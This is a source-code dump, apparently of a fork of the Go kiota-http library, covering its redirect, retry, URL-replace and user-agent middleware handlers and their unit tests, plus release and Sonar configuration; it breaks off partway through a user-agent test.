getDefaultClientWithoutMiddleware() 34 | resp, err := client.Do(req) 35 | if err != nil { 36 | t.Error(err) 37 | } 38 | assert.NotNil(t, resp) 39 | assert.Equal(t, int64(1), requestCount) 40 | } 41 | 42 | func TestItHonoursShouldRedirect(t *testing.T) { 43 | requestCount := int64(0) 44 | testServer := httptest.NewServer(nethttp.HandlerFunc(func(res nethttp.ResponseWriter, req *nethttp.Request) { 45 | requestCount++ 46 | res.Header().Set("Location", "/"+strconv.FormatInt(requestCount, 10)) 47 | res.WriteHeader(301) 48 | res.Write([]byte("body")) 49 | })) 50 | defer func() { testServer.Close() }() 51 | handler := NewRedirectHandlerWithOptions(RedirectHandlerOptions{ 52 | ShouldRedirect: func(req *nethttp.Request, res *nethttp.Response) bool { 53 | return false 54 | }, 55 | }) 56 | req, err := nethttp.NewRequest(nethttp.MethodGet, testServer.URL, nil) 57 | if err != nil { 58 | t.Error(err) 59 | } 60 | resp, err := handler.Intercept(newNoopPipeline(), 0, req) 61 | if err != nil { 62 | t.Error(err) 63 | } 64 | assert.NotNil(t, resp) 65 | assert.Equal(t, int64(1), requestCount) 66 | } 67 | 68 | func TestItHonoursMaxRedirect(t *testing.T) { 69 | requestCount := int64(0) 70 | testServer := httptest.NewServer(nethttp.HandlerFunc(func(res nethttp.ResponseWriter, req *nethttp.Request) { 71 | requestCount++ 72 | res.Header().Set("Location", "/"+strconv.FormatInt(requestCount, 10)) 73 | res.WriteHeader(301) 74 | res.Write([]byte("body")) 75 | })) 76 | defer func() { testServer.Close() }() 77 | handler := NewRedirectHandler() 78 | req, err := nethttp.NewRequest(nethttp.MethodGet, testServer.URL, nil) 79 | if err != nil { 80 | t.Error(err) 81 | } 82 | resp, err := handler.Intercept(newNoopPipeline(), 0, req) 83 | if err != nil { 84 | t.Error(err) 85 | } 86 | assert.NotNil(t, resp) 87 | assert.Equal(t, int64(defaultMaxRedirects+1), requestCount) 88 | } 89 | 90 | func TestItStripsAuthorizationHeaderOnDifferentHost(t *testing.T) { 91 | testServer := httptest.NewServer(nethttp.HandlerFunc(func(res nethttp.ResponseWriter, req *nethttp.Request) { 92 | res.Header().Set("Location", "https://www.bing.com/") 93 | res.WriteHeader(301) 94 | res.Write([]byte("body")) 95 | })) 96 | defer func() { testServer.Close() }() 97 | handler := NewRedirectHandler() 98 | req, err := nethttp.NewRequest(nethttp.MethodGet, testServer.URL, nil) 99 | if err != nil { 100 | t.Error(err) 101 | } 102 | req.Header.Set("Authorization", "Bearer 12345") 103 | client := getDefaultClientWithoutMiddleware() 104 | resp, err := client.Do(req) 105 | if err != nil { 106 | t.Error(err) 107 | } 108 | result, err := handler.getRedirectRequest(req, resp) 109 | if err != nil { 110 | t.Error(err) 111 | } 112 | assert.NotNil(t, result) 113 | assert.Equal(t, "www.bing.com", result.Host) 114 | assert.Equal(t, "", result.Header.Get("Authorization")) 115 | } 116 | -------------------------------------------------------------------------------- /release-please-config.json: -------------------------------------------------------------------------------- 1 | { 2 | "release-type": "go", 3 | "bump-minor-pre-major": true, 4 | "bump-patch-for-minor-pre-major": true, 5 | "include-component-in-tag": false, 6 | "include-v-in-tag": true, 7 | "packages": { 8 | ".": { 9 | "package-name": "github.com/ordinaryhydr/kiota-http-go", 10 | "changelog-path": "CHANGELOG.md", 11 | "extra-files": [ 12 | "user_agent_handler.go" 13 | ] 14 | } 15 | }, 16 | "$schema": "https://raw.githubusercontent.com/googleapis/release-please/main/schemas/config.json" 17 | } 18 | -------------------------------------------------------------------------------- /retry_handler.go: -------------------------------------------------------------------------------- 1 | package nethttplibrary 2 | 3 | import ( 4 | "context" 5 | "fmt" 6 | "io" 7 | "math" 8 | nethttp "net/http" 9 | "strconv" 10 | "time" 11 | 12 | abs "github.com/microsoft/kiota-abstractions-go" 13 | "go.opentelemetry.io/otel" 14 | "go.opentelemetry.io/otel/attribute" 15 | "go.opentelemetry.io/otel/trace" 16 | ) 17 | 18 | // RetryHandler handles transient HTTP responses and retries the request given the retry options 19 | type RetryHandler struct { 20 | // default options to use when evaluating the response 21 | options RetryHandlerOptions 22 | } 23 | 24 | // NewRetryHandler creates a new RetryHandler with default options 25 | func NewRetryHandler() *RetryHandler { 26 | return NewRetryHandlerWithOptions(RetryHandlerOptions{ 27 | ShouldRetry: func(delay time.Duration, executionCount int, request *nethttp.Request, response *nethttp.Response) bool { 28 | return true 29 | }, 30 | }) 31 | } 32 | 33 | // NewRetryHandlerWithOptions creates a new RetryHandler with the given options 34 | func NewRetryHandlerWithOptions(options RetryHandlerOptions) *RetryHandler { 35 | return &RetryHandler{options: options} 36 | } 37 | 38 | const defaultMaxRetries = 3 39 | const absoluteMaxRetries = 10 40 | const defaultDelaySeconds = 3 41 | const absoluteMaxDelaySeconds = 180 42 | 43 | // RetryHandlerOptions to apply when evaluating the response for retrial 44 | type RetryHandlerOptions struct { 45 | // Callback to determine if the request should be retried 46 | ShouldRetry func(delay time.Duration, executionCount int, request *nethttp.Request, response *nethttp.Response) bool 47 | // The maximum number of times a request can be retried 48 | MaxRetries int 49 | // The delay in seconds between retries 50 | DelaySeconds int 51 | } 52 | 53 | type retryHandlerOptionsInt interface { 54 | abs.RequestOption 55 | GetShouldRetry() func(delay time.Duration, executionCount int, request *nethttp.Request, response *nethttp.Response) bool 56 | GetDelaySeconds() int 57 | GetMaxRetries() int 58 | } 59 | 60 | var retryKeyValue = abs.RequestOptionKey{ 61 | Key: "RetryHandler", 62 | } 63 | 64 | // GetKey returns the key value to be used when the option is added to the request context 65 | func (options *RetryHandlerOptions) GetKey() abs.RequestOptionKey { 66 | return retryKeyValue 67 | } 68 | 69 | // GetShouldRetry returns the should retry callback function which evaluates the response for retrial 70 | func (options *RetryHandlerOptions) GetShouldRetry() func(delay time.Duration, executionCount int, request *nethttp.Request, response *nethttp.Response) bool { 71 | return options.ShouldRetry 72 | } 73 | 74 | // GetDelaySeconds returns the delays in seconds between retries 75 | func (options *RetryHandlerOptions) GetDelaySeconds() int { 76 | if options.DelaySeconds < 1 { 77 | return defaultDelaySeconds 78 | } else if options.DelaySeconds > absoluteMaxDelaySeconds { 79 | return absoluteMaxDelaySeconds 80 | } else { 81 | return options.DelaySeconds 82 | } 83 | } 84 | 85 | // GetMaxRetries returns the maximum number of times a request can be retried 86 | func (options *RetryHandlerOptions) GetMaxRetries() int { 87 | if options.MaxRetries < 1 { 88 | return defaultMaxRetries 89 | } else if options.MaxRetries > absoluteMaxRetries { 90 | return absoluteMaxRetries 91 | } else { 92 | return options.MaxRetries 93 | } 94 | } 95 | 96 | const retryAttemptHeader = "Retry-Attempt" 97 | const retryAfterHeader = "Retry-After" 98 | 99 | const tooManyRequests = 429 100 | const serviceUnavailable = 503 101 | const gatewayTimeout = 504 102 | 103 | // Intercept implements the interface and evaluates whether to retry a failed request. 104 | func (middleware RetryHandler) Intercept(pipeline Pipeline, middlewareIndex int, req *nethttp.Request) (*nethttp.Response, error) { 105 | obsOptions := GetObservabilityOptionsFromRequest(req) 106 | ctx := req.Context() 107 | var span trace.Span 108 | var observabilityName string 109 | if obsOptions != nil { 110 | observabilityName = obsOptions.GetTracerInstrumentationName() 111 | ctx, span = otel.GetTracerProvider().Tracer(observabilityName).Start(ctx, "RetryHandler_Intercept") 112 | span.SetAttributes(attribute.Bool("com.microsoft.kiota.handler.retry.enable", true)) 113 | defer span.End() 114 | req = req.WithContext(ctx) 115 | } 116 | response, err := pipeline.Next(req, middlewareIndex) 117 | if err != nil { 118 | return response, err 119 | } 120 | reqOption, ok := req.Context().Value(retryKeyValue).(retryHandlerOptionsInt) 121 | if !ok { 122 | reqOption = &middleware.options 123 | } 124 | return middleware.retryRequest(ctx, pipeline, middlewareIndex, reqOption, req, response, 0, 0, observabilityName) 125 | } 126 | 127 | func (middleware RetryHandler) retryRequest(ctx context.Context, pipeline Pipeline, middlewareIndex int, options retryHandlerOptionsInt, req *nethttp.Request, resp *nethttp.Response, executionCount int, cumulativeDelay time.Duration, observabilityName string) (*nethttp.Response, error) { 128 | if middleware.isRetriableErrorCode(resp.StatusCode) && 129 | middleware.isRetriableRequest(req) && 130 | executionCount < options.GetMaxRetries() && 131 | cumulativeDelay < time.Duration(absoluteMaxDelaySeconds)*time.Second && 132 | options.GetShouldRetry()(cumulativeDelay, executionCount, req, resp) { 133 | executionCount++ 134 | delay := middleware.getRetryDelay(req, resp, options, executionCount) 135 | cumulativeDelay += delay 136 | req.Header.Set(retryAttemptHeader, strconv.Itoa(executionCount)) 137 | if req.Body != nil { 138 | s, ok := req.Body.(io.Seeker) 139 | if ok { 140 | s.Seek(0, io.SeekStart) 141 | } 142 | } 143 | if observabilityName != "" { 144 | ctx, span := otel.GetTracerProvider().Tracer(observabilityName).Start(ctx, "RetryHandler_Intercept - attempt "+fmt.Sprint(executionCount)) 145 | span.SetAttributes(attribute.Int("http.request.resend_count", executionCount), 146 | 147 | httpResponseStatusCodeAttribute.Int(resp.StatusCode), 148 | attribute.Float64("http.request.resend_delay", delay.Seconds()), 149 | ) 150 | defer span.End() 151 | req = req.WithContext(ctx) 152 | } 153 | t := time.NewTimer(delay) 154 | select { 155 | case <-ctx.Done(): 156 | // Return without retrying if the context was cancelled. 157 | return nil, ctx.Err() 158 | 159 | // Leaving this case empty causes it to exit the switch-block. 160 | case <-t.C: 161 | } 162 | response, err := pipeline.Next(req, middlewareIndex) 163 | if err != nil { 164 | return response, err 165 | } 166 | return middleware.retryRequest(ctx, pipeline, middlewareIndex, options, req, response, executionCount, cumulativeDelay, observabilityName) 167 | } 168 | return resp, nil 169 | } 170 | 171 | func (middleware RetryHandler) isRetriableErrorCode(code int) bool { 172 | return code == tooManyRequests || code == serviceUnavailable || code == gatewayTimeout 173 | } 174 | func (middleware RetryHandler) isRetriableRequest(req *nethttp.Request) bool { 175 | isBodiedMethod := req.Method == "POST" || req.Method == "PUT" || req.Method == "PATCH" 176 | if isBodiedMethod && req.Body != nil { 177 | return req.ContentLength != -1 178 | } 179 | return true 180 | } 181 | 182 | func (middleware RetryHandler) getRetryDelay(req *nethttp.Request, resp *nethttp.Response, options retryHandlerOptionsInt, executionCount int) time.Duration { 183 | retryAfter := resp.Header.Get(retryAfterHeader) 184 | if retryAfter != "" { 185 | retryAfterDelay, err := strconv.ParseFloat(retryAfter, 64) 186 | if err == nil { 187 | return time.Duration(retryAfterDelay) * time.Second 188 | } 189 | 190 | // parse the header if it's a date 191 | t, err := time.Parse(time.RFC1123, retryAfter) 192 | if err == nil { 193 | return t.Sub(time.Now()) 194 | } 195 | } 196 | return time.Duration(math.Pow(float64(options.GetDelaySeconds()), float64(executionCount))) * time.Second 197 | } 198 | -------------------------------------------------------------------------------- /retry_handler_test.go: -------------------------------------------------------------------------------- 1 | package nethttplibrary 2 | 3 | import ( 4 | "context" 5 | nethttp "net/http" 6 | httptest "net/http/httptest" 7 | testing "testing" 8 | "time" 9 | 10 | "strconv" 11 | 12 | assert "github.com/stretchr/testify/assert" 13 | ) 14 | 15 | type NoopPipeline struct { 16 | client *nethttp.Client 17 | } 18 | 19 | func (pipeline *NoopPipeline) Next(req *nethttp.Request, middlewareIndex int) (*nethttp.Response, error) { 20 | return pipeline.client.Do(req) 21 | } 22 | func newNoopPipeline() *NoopPipeline { 23 | return &NoopPipeline{ 24 | client: getDefaultClientWithoutMiddleware(), 25 | } 26 | } 27 | func TestItCreatesANewRetryHandler(t *testing.T) { 28 | handler := NewRetryHandler() 29 | if handler == nil { 30 | t.Error("handler is nil") 31 | } 32 | } 33 | func TestItAddsRetryAttemptHeaders(t *testing.T) { 34 | retryAttemptInt := 0 35 | testServer := httptest.NewServer(nethttp.HandlerFunc(func(res nethttp.ResponseWriter, req *nethttp.Request) { 36 | retryAttempt := req.Header.Get("Retry-Attempt") 37 | if retryAttempt == "" { 38 | res.WriteHeader(429) 39 | } else { 40 | res.WriteHeader(200) 41 | retryAttemptInt, _ = strconv.Atoi(retryAttempt) 42 | } 43 | res.Write([]byte("body")) 44 | })) 45 | defer func() { testServer.Close() }() 46 | handler := NewRetryHandler() 47 | req, err := nethttp.NewRequest(nethttp.MethodGet, testServer.URL, nil) 48 | if err != nil { 49 | t.Error(err) 50 | } 51 | resp, err := handler.Intercept(newNoopPipeline(), 0, req) 52 | if err != nil { 53 | t.Error(err) 54 | } 55 | assert.NotNil(t, resp) 56 | assert.Equal(t, 1, retryAttemptInt) 57 | } 58 | 59 | func TestItHonoursShouldRetry(t *testing.T) { 60 | testServer := httptest.NewServer(nethttp.HandlerFunc(func(res nethttp.ResponseWriter, req *nethttp.Request) { 61 | retryAttempt := req.Header.Get("Retry-Attempt") 62 | if retryAttempt == "" { 63 | res.WriteHeader(429) 64 | } else { 65 | res.WriteHeader(200) 66 | } 67 | res.Write([]byte("body")) 68 | })) 69 | defer func() { testServer.Close() }() 70 | handler := NewRetryHandlerWithOptions(RetryHandlerOptions{ 71 | ShouldRetry: func(delay time.Duration, executionCount int, request *nethttp.Request, response *nethttp.Response) bool { 72 | return false 73 | }, 74 | }) 75 | req, err := nethttp.NewRequest(nethttp.MethodGet, testServer.URL, nil) 76 | if err != nil { 77 | t.Error(err) 78 | } 79 | resp, err := handler.Intercept(newNoopPipeline(), 0, req) 80 | if err != nil { 81 | t.Error(err) 82 | } 83 | assert.NotNil(t, resp) 84 | assert.Equal(t, 429, resp.StatusCode) 85 | } 86 | 87 | func TestItHonoursMaxRetries(t *testing.T) { 88 | retryAttemptInt := -1 89 | testServer := httptest.NewServer(nethttp.HandlerFunc(func(res nethttp.ResponseWriter, req *nethttp.Request) { 90 | res.WriteHeader(429) 91 | retryAttemptInt++ 92 | res.Write([]byte("body")) 93 | })) 94 | defer func() { testServer.Close() }() 95 | handler := NewRetryHandler() 96 | req, err := nethttp.NewRequest(nethttp.MethodGet, testServer.URL, nil) 97 | if err != nil { 98 | t.Error(err) 99 | } 100 | resp, err := handler.Intercept(newNoopPipeline(), 0, req) 101 | if err != nil { 102 | t.Error(err) 103 | } 104 | assert.NotNil(t, resp) 105 | assert.Equal(t, 429, resp.StatusCode) 106 | assert.Equal(t, defaultMaxRetries, retryAttemptInt) 107 | } 108 | 109 | func TestItHonoursRetryAfterDate(t *testing.T) { 110 | retryAttemptInt := -1 111 | start := time.Now() 112 | retryAfterTimeStr := start.Add(4 * time.Second).Format(time.RFC1123) 113 | testServer := httptest.NewServer(nethttp.HandlerFunc(func(res nethttp.ResponseWriter, req *nethttp.Request) { 114 | res.Header().Set("Retry-After", retryAfterTimeStr) 115 | res.WriteHeader(429) 116 | retryAttemptInt++ 117 | res.Write([]byte("body")) 118 | })) 119 | 120 | defer func() { testServer.Close() }() 121 | handler := NewRetryHandler() 122 | req, err := nethttp.NewRequest(nethttp.MethodGet, testServer.URL, nil) 123 | if err != nil { 124 | t.Error(err) 125 | } 126 | resp, err := handler.Intercept(newNoopPipeline(), 0, req) 127 | if err != nil { 128 | t.Error(err) 129 | } 130 | assert.NotNil(t, resp) 131 | end := time.Now() 132 | 133 | assert.Equal(t, defaultMaxRetries, retryAttemptInt) 134 | assert.Greater(t, end.Sub(start), 3*time.Second) // delay should be greater than 3 seconds (ignoring microsecond differences) 135 | } 136 | 137 | func TestItHonoursContextExpiry(t *testing.T) { 138 | retryAttemptInt := -1 139 | testServer := httptest.NewServer(nethttp.HandlerFunc(func(res nethttp.ResponseWriter, req *nethttp.Request) { 140 | res.Header().Set("Retry-After", "5") 141 | res.WriteHeader(429) 142 | retryAttemptInt++ 143 | res.Write([]byte("body")) 144 | })) 145 | defer func() { testServer.Close() }() 146 | ctx, cancel := context.WithTimeout(context.Background(), 2*time.Second) 147 | defer cancel() 148 | handler := NewRetryHandler() 149 | req, err := nethttp.NewRequestWithContext(ctx, nethttp.MethodGet, testServer.URL, nil) 150 | if err != nil { 151 | t.Error(err) 152 | } 153 | start := time.Now() 154 | resp, err := handler.Intercept(newNoopPipeline(), 0, req) 155 | end := time.Now() 156 | assert.Error(t, err) 157 | assert.Nil(t, resp) 158 | // Should not have retried because context expired. 159 | assert.Equal(t, 0, retryAttemptInt) 160 | assert.Less(t, end.Sub(start), 4*time.Second) 161 | } 162 | 163 | func TestItHonoursContextCancelled(t *testing.T) { 164 | retryAttemptInt := -1 165 | testServer := httptest.NewServer(nethttp.HandlerFunc(func(res nethttp.ResponseWriter, req *nethttp.Request) { 166 | res.Header().Set("Retry-After", "5") 167 | res.WriteHeader(429) 168 | retryAttemptInt++ 169 | res.Write([]byte("body")) 170 | })) 171 | defer func() { testServer.Close() }() 172 | ctx, cancel := context.WithCancel(context.Background()) 173 | handler := NewRetryHandler() 174 | req, err := nethttp.NewRequestWithContext(ctx, nethttp.MethodGet, testServer.URL, nil) 175 | if err != nil { 176 | t.Error(err) 177 | } 178 | go func() { 179 | time.Sleep(1 * time.Second) 180 | cancel() 181 | }() 182 | start := time.Now() 183 | resp, err := handler.Intercept(newNoopPipeline(), 0, req) 184 | end := time.Now() 185 | assert.Error(t, err) 186 | assert.Nil(t, resp) 187 | // Should not have retried because context expired. 188 | assert.Equal(t, 0, retryAttemptInt) 189 | assert.Less(t, end.Sub(start), 4*time.Second) 190 | } 191 | 192 | func TestItDoesntRetryOnSuccess(t *testing.T) { 193 | retryAttemptInt := -1 194 | testServer := httptest.NewServer(nethttp.HandlerFunc(func(res nethttp.ResponseWriter, req *nethttp.Request) { 195 | res.WriteHeader(200) 196 | retryAttemptInt++ 197 | res.Write([]byte("body")) 198 | })) 199 | defer func() { testServer.Close() }() 200 | handler := NewRetryHandler() 201 | req, err := nethttp.NewRequest(nethttp.MethodGet, testServer.URL, nil) 202 | if err != nil { 203 | t.Error(err) 204 | } 205 | resp, err := handler.Intercept(newNoopPipeline(), 0, req) 206 | if err != nil { 207 | t.Error(err) 208 | } 209 | assert.NotNil(t, resp) 210 | assert.Equal(t, 0, retryAttemptInt) 211 | } 212 | -------------------------------------------------------------------------------- /sonar-project.properties: -------------------------------------------------------------------------------- 1 | sonar.projectKey=microsoft_kiota-http-go 2 | sonar.organization=microsoft 3 | sonar.exclusions=**/*_test.go 4 | sonar.test.inclusions=**/*_test.go 5 | sonar.go.tests.reportPaths=result.out 6 | sonar.go.coverage.reportPaths=cover.out -------------------------------------------------------------------------------- /span_attributes.go: -------------------------------------------------------------------------------- 1 | package nethttplibrary 2 | 3 | import "go.opentelemetry.io/otel/attribute" 4 | 5 | // HTTP Request attributes 6 | const ( 7 | httpRequestBodySizeAttribute = attribute.Key("http.request.body.size") 8 | httpRequestResendCountAttribute = attribute.Key("http.request.resend_count") 9 | httpRequestMethodAttribute = attribute.Key("http.request.method") 10 | httpRequestHeaderContentTypeAttribute = attribute.Key("http.request.header.content-type") 11 | ) 12 | 13 | // HTTP Response attributes 14 | const ( 15 | httpResponseBodySizeAttribute = attribute.Key("http.response.body.size") 16 | httpResponseHeaderContentTypeAttribute = attribute.Key("http.response.header.content-type") 17 | httpResponseStatusCodeAttribute = attribute.Key("http.response.status_code") 18 | ) 19 | 20 | // Network attributes 21 | const ( 22 | networkProtocolNameAttribute = attribute.Key("network.protocol.name") 23 | ) 24 | 25 | // Server attributes 26 | const ( 27 | serverAddressAttribute = attribute.Key("server.address") 28 | ) 29 | 30 | // URL attributes 31 | const ( 32 | urlFullAttribute = attribute.Key("url.full") 33 | urlSchemeAttribute = attribute.Key("url.scheme") 34 | urlUriTemplateAttribute = attribute.Key("url.uri_template") 35 | ) 36 | -------------------------------------------------------------------------------- /url_replace_handler.go: -------------------------------------------------------------------------------- 1 | package nethttplibrary 2 | 3 | import ( 4 | abstractions "github.com/microsoft/kiota-abstractions-go" 5 | "go.opentelemetry.io/otel" 6 | "go.opentelemetry.io/otel/attribute" 7 | "go.opentelemetry.io/otel/trace" 8 | "net/http" 9 | "strings" 10 | ) 11 | 12 | var urlReplaceOptionKey = abstractions.RequestOptionKey{Key: "UrlReplaceOptionKey"} 13 | 14 | // UrlReplaceHandler is a middleware handler that replaces url segments in the uri path. 15 | type UrlReplaceHandler struct { 16 | options UrlReplaceOptions 17 | } 18 | 19 | // NewUrlReplaceHandler creates a configuration object for the CompressionHandler 20 | func NewUrlReplaceHandler(enabled bool, replacementPairs map[string]string) *UrlReplaceHandler { 21 | return &UrlReplaceHandler{UrlReplaceOptions{Enabled: enabled, ReplacementPairs: replacementPairs}} 22 | } 23 | 24 | // UrlReplaceOptions is a configuration object for the UrlReplaceHandler middleware 25 | type UrlReplaceOptions struct { 26 | Enabled bool 27 | ReplacementPairs map[string]string 28 | } 29 | 30 | // GetKey returns UrlReplaceOptions unique name in context object 31 | func (u *UrlReplaceOptions) GetKey() abstractions.RequestOptionKey { 32 | return urlReplaceOptionKey 33 | } 34 | 35 | // GetReplacementPairs reads ReplacementPairs settings from UrlReplaceOptions 36 | func (u *UrlReplaceOptions) GetReplacementPairs() map[string]string { 37 | return u.ReplacementPairs 38 | } 39 | 40 | // IsEnabled reads Enabled setting from UrlReplaceOptions 41 | func (u *UrlReplaceOptions) IsEnabled() bool { 42 | return u.Enabled 43 | } 44 | 45 | type urlReplaceOptionsInt interface { 46 | abstractions.RequestOption 47 | IsEnabled() bool 48 | GetReplacementPairs() map[string]string 49 | } 50 | 51 | // Intercept is invoked by the middleware pipeline to either move the request/response 52 | // to the next middleware in the pipeline 53 | func (c *UrlReplaceHandler) Intercept(pipeline Pipeline, middlewareIndex int, req *http.Request) (*http.Response, error) { 54 | reqOption, ok := req.Context().Value(urlReplaceOptionKey).(urlReplaceOptionsInt) 55 | if !ok { 56 | reqOption = &c.options 57 | } 58 | 59 | obsOptions := GetObservabilityOptionsFromRequest(req) 60 | ctx := req.Context() 61 | var span trace.Span 62 | if obsOptions != nil { 63 | ctx, span = otel.GetTracerProvider().Tracer(obsOptions.GetTracerInstrumentationName()).Start(ctx, "UrlReplaceHandler_Intercept") 64 | span.SetAttributes(attribute.Bool("com.microsoft.kiota.handler.url_replacer.enable", true)) 65 | defer span.End() 66 | req = req.WithContext(ctx) 67 | } 68 | 69 | if !reqOption.IsEnabled() || len(reqOption.GetReplacementPairs()) == 0 { 70 | return pipeline.Next(req, middlewareIndex) 71 | } 72 | 73 | req.URL.Path = ReplacePathTokens(req.URL.Path, reqOption.GetReplacementPairs()) 74 | 75 | if span != nil { 76 | span.SetAttributes(attribute.String("http.request_url", req.RequestURI)) 77 | } 78 | 79 | return pipeline.Next(req, middlewareIndex) 80 | } 81 | 82 | // ReplacePathTokens invokes token replacement logic on the given url path 83 | func ReplacePathTokens(path string, replacementPairs map[string]string) string { 84 | for key, value := range replacementPairs { 85 | path = strings.Replace(path, key, value, 1) 86 | } 87 | return path 88 | } 89 | -------------------------------------------------------------------------------- /url_replace_handler_test.go: -------------------------------------------------------------------------------- 1 | package nethttplibrary 2 | 3 | import ( 4 | "errors" 5 | "github.com/stretchr/testify/assert" 6 | nethttp "net/http" 7 | "testing" 8 | ) 9 | 10 | type SpyPipeline struct { 11 | client *nethttp.Client 12 | receivedRequest *nethttp.Request 13 | } 14 | 15 | func (pipeline *SpyPipeline) Next(req *nethttp.Request, middlewareIndex int) (*nethttp.Response, error) { 16 | pipeline.receivedRequest = req 17 | return nil, errors.New("Spy executor only") 18 | } 19 | func newSpyPipeline() *SpyPipeline { 20 | return &SpyPipeline{ 21 | client: getDefaultClientWithoutMiddleware(), 22 | } 23 | } 24 | func (pipeline *SpyPipeline) GetReceivedRequest() *nethttp.Request { 25 | return pipeline.receivedRequest 26 | } 27 | 28 | func TestURLReplacementHandler(t *testing.T) { 29 | 30 | handler := NewUrlReplaceHandler(true, map[string]string{"/users/me-token-to-replace": "/me"}) 31 | if handler == nil { 32 | t.Error("handler is nil") 33 | } 34 | url := "https://msgraph.com/users/me-token-to-replace/contactFolders" 35 | req, err := nethttp.NewRequest(nethttp.MethodGet, url, nil) 36 | if err != nil { 37 | t.Error(err) 38 | } 39 | 40 | pipeline := newSpyPipeline() 41 | _, _ = handler.Intercept(pipeline, 0, req) 42 | 43 | assert.Equal(t, pipeline.GetReceivedRequest().URL.Path, "/me/contactFolders") 44 | } 45 | -------------------------------------------------------------------------------- /user_agent_handler.go: -------------------------------------------------------------------------------- 1 | package nethttplibrary 2 | 3 | import ( 4 | "fmt" 5 | nethttp "net/http" 6 | "strings" 7 | 8 | abs "github.com/microsoft/kiota-abstractions-go" 9 | "go.opentelemetry.io/otel" 10 | "go.opentelemetry.io/otel/attribute" 11 | ) 12 | 13 | // UserAgentHandler adds the product to the user agent header. 14 | type UserAgentHandler struct { 15 | options UserAgentHandlerOptions 16 | } 17 | 18 | // NewUserAgentHandler creates a new user agent handler with the default options. 19 | func NewUserAgentHandler() *UserAgentHandler { 20 | return NewUserAgentHandlerWithOptions(nil) 21 | } 22 | 23 | // NewUserAgentHandlerWithOptions creates a new user agent handler with the specified options. 24 | func NewUserAgentHandlerWithOptions(options *UserAgentHandlerOptions) *UserAgentHandler { 25 | if options == nil { 26 | options = NewUserAgentHandlerOptions() 27 | } 28 | return &UserAgentHandler{ 29 | options: *options, 30 | } 31 | } 32 | 33 | // UserAgentHandlerOptions to use when adding the product to the user agent header. 34 | type UserAgentHandlerOptions struct { 35 | Enabled bool 36 | ProductName string 37 | ProductVersion string 38 | } 39 | 40 | // NewUserAgentHandlerOptions creates a new user agent handler options with the default values. 41 | func NewUserAgentHandlerOptions() *UserAgentHandlerOptions { 42 | return &UserAgentHandlerOptions{ 43 | Enabled: true, 44 | ProductName: "kiota-go", 45 | /** The package version */ 46 | // x-release-please-start-version 47 | ProductVersion: "1.5.3", 48 | // x-release-please-end 49 | } 50 | } 51 | 52 | var userAgentKeyValue = abs.RequestOptionKey{ 53 | Key: "UserAgentHandler", 54 | } 55 | 56 | type userAgentHandlerOptionsInt interface { 57 | abs.RequestOption 58 | GetEnabled() bool 59 | GetProductName() string 60 | GetProductVersion() string 61 | } 62 | 63 | // GetKey returns the key value to be used when the option is added to the request context 64 | func (options *UserAgentHandlerOptions) GetKey() abs.RequestOptionKey { 65 | return userAgentKeyValue 66 | } 67 | 68 | // GetEnabled returns the value of the enabled property 69 | func (options *UserAgentHandlerOptions) GetEnabled() bool { 70 | return options.Enabled 71 | } 72 | 73 | // GetProductName returns the value of the product name property 74 | func (options *UserAgentHandlerOptions) GetProductName() string { 75 | return options.ProductName 76 | } 77 | 78 | // GetProductVersion returns the value of the product version property 79 | func (options *UserAgentHandlerOptions) GetProductVersion() string { 80 | return options.ProductVersion 81 | } 82 | 83 | const userAgentHeaderKey = "User-Agent" 84 | 85 | func (middleware UserAgentHandler) Intercept(pipeline Pipeline, middlewareIndex int, req *nethttp.Request) (*nethttp.Response, error) { 86 | obsOptions := GetObservabilityOptionsFromRequest(req) 87 | if obsOptions != nil { 88 | observabilityName := obsOptions.GetTracerInstrumentationName() 89 | ctx := req.Context() 90 | ctx, span := otel.GetTracerProvider().Tracer(observabilityName).Start(ctx, "UserAgentHandler_Intercept") 91 | span.SetAttributes(attribute.Bool("com.microsoft.kiota.handler.useragent.enable", true)) 92 | defer span.End() 93 | req = req.WithContext(ctx) 94 | } 95 | options, ok := req.Context().Value(userAgentKeyValue).(userAgentHandlerOptionsInt) 96 | if !ok { 97 | options = &middleware.options 98 | } 99 | if options.GetEnabled() { 100 | additionalValue := fmt.Sprintf("%s/%s", options.GetProductName(), options.GetProductVersion()) 101 | currentValue := req.Header.Get(userAgentHeaderKey) 102 | if currentValue == "" { 103 | req.Header.Set(userAgentHeaderKey, additionalValue) 104 | } else if !strings.Contains(currentValue, additionalValue) { 105 | req.Header.Set(userAgentHeaderKey, fmt.Sprintf("%s %s", currentValue, additionalValue)) 106 | } 107 | } 108 | return pipeline.Next(req, middlewareIndex) 109 | } 110 | -------------------------------------------------------------------------------- /user_agent_handler_test.go: -------------------------------------------------------------------------------- 1 | package nethttplibrary 2 | 3 | import ( 4 | nethttp "net/http" 5 | httptest "net/http/httptest" 6 | "strings" 7 | "testing" 8 | 9 | "github.com/stretchr/testify/assert" 10 | ) 11 | 12 | func TestItAddsTheUserAgentHeader(t *testing.T) { 13 | handler := NewUserAgentHandler() 14 | testServer := httptest.NewServer(nethttp.HandlerFunc(func(res nethttp.ResponseWriter, req *nethttp.Request) { 15 | res.WriteHeader(200) 16 | res.Write([]byte("body")) 17 | })) 18 | req, err := nethttp.NewRequest(nethttp.MethodGet, testServer.URL, nil) 19 | if err != nil { 20 | t.Error(err) 21 | } 22 | resp, err := handler.Intercept(newNoopPipeline(), 0, req) 23 | if err != nil { 24 | t.Error(err) 25 | } 26 | assert.NotNil(t, resp) 27 | assert.Equal(t, "kiota-go", strings.Split(req.Header.Get("User-Agent"), "/")[0]) 28 | } 29 | 30 | func TestItAddsTheUserAgentHeaderOnce(t *testing.T) { 31 | handler := NewUserAgentHandler() 32 | testServer := httptest.NewServer(nethttp.HandlerFunc(func(res nethttp.ResponseWriter, req *nethttp.Request) { 33 | res.WriteHeader(200) 34 | res.Write([]byte("body")) 35 | })) 36 | req, err := nethttp.NewRequest(nethttp.MethodGet, testServer.URL, nil) 37 | if err != nil { 38 | t.Error(err) 39 | } 40 | resp, err := handler.Intercept(newNoopPipeline(), 0, req) 41 | if err != nil { 42 | t.Error(err) 43 | } 44 | resp, err = handler.Intercept(newNoopPipeline(), 0, req) 45 | if err != nil { 46 | t.Error(err) 47 | } 48 | assert.NotNil(t, resp) 49 | assert.Equal(t, 1, len(strings.Split(req.Header.Get("User-Agent"), "kiota-go"))-1) 50 | } 51 | 52 | func TestItDoesNotAddTheUserAgentHeaderWhenDisabled(t *testing.T) { 53 | options := NewUserAgentHandlerOptions() 54 | options.Enabled = false 55 | handler := NewUserAgentHandlerWithOptions(options) 56 | testServer := httptest.NewServer(nethttp.HandlerFunc(func(res nethttp.ResponseWriter, req *nethttp.Request) { 57 | 